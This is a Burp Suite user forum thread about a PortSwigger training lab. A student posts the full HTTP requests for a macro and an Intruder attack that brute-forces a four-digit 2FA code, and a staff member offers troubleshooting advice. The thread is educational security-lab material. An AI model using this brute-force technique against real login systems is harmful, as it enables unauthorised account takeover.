Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Lab: 2FA bypass using a brute-force attack doesn't get me a 302

Student921 | Last updated: Jul 04, 2022 09:17PM UTC

Hi, when i do the the brute forcing attack via macro + intruder, i always receive Code 200 Responses, but no 302. Macro is build like this: (1) GET /login HTTP/1.1 Host: 0a0a008203516d83c09d776400b40024.web-security-academy.net Cookie: session=ru5TQKAWEBXuPQ2K0AVDrrYZOD6uwa8X User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Referer: https://0a0a008203516d83c09d776400b40024.web-security-academy.net/ Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers Connection: close (2) POST /login HTTP/1.1 Host: 0a0a008203516d83c09d776400b40024.web-security-academy.net Cookie: session=ru5TQKAWEBXuPQ2K0AVDrrYZOD6uwa8X User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 70 Origin: https://0a0a008203516d83c09d776400b40024.web-security-academy.net Referer: https://0a0a008203516d83c09d776400b40024.web-security-academy.net/login Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers Connection: close csrf=aSabNJI55k2rKw87IxcAIqw1YGK1aKeC&username=carlos&password=montoya (3) GET /login2 HTTP/1.1 Host: 0a0a008203516d83c09d776400b40024.web-security-academy.net Cookie: session=UFiW2Evz4AzFbNLRtSY5E4kVZO3e8eCW User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Referer: https://0a0a008203516d83c09d776400b40024.web-security-academy.net/login Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers Connection: close Following Intruder Request: POST /login2 HTTP/1.1 Host: 0a0a008203516d83c09d776400b40024.web-security-academy.net Cookie: session=bBw94J7y58PIvJ2MkQinolOt1ELI8bsN User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 51 Origin: https://0a0a008203516d83c09d776400b40024.web-security-academy.net Referer: https://0a0a008203516d83c09d776400b40024.web-security-academy.net/login2 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers Connection: close csrf=USAUKTr2RAVWNFwDwrWNkCycDI9RzYJR&mfa-code=§x§ Where x is any combinations from 0000 to 9999

Ben, PortSwigger Agent | Last updated: Jul 05, 2022 07:52AM UTC

Hi Dejan, I have just run through this lab and was able to solve it using the solution provided so it does appear to be working as expected. A few things to check: - Have you tested the macro just to make sure that you are landing on the page where you enter the security code (the solution mentions this so I assume you have but just to be sure)? - Have you configured your resource pool settings so that you are only sending a maximum of one concurrent request during the Intruder attack? - How long do you leave the attack running for (I believe that we have configured the solution to always be at the lower end of the possible number range but, as an example, I did not hit the correct security code until the 1428th request had been sent so just want to confirm that you are leaving the attack running for a suitable length of time)?

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.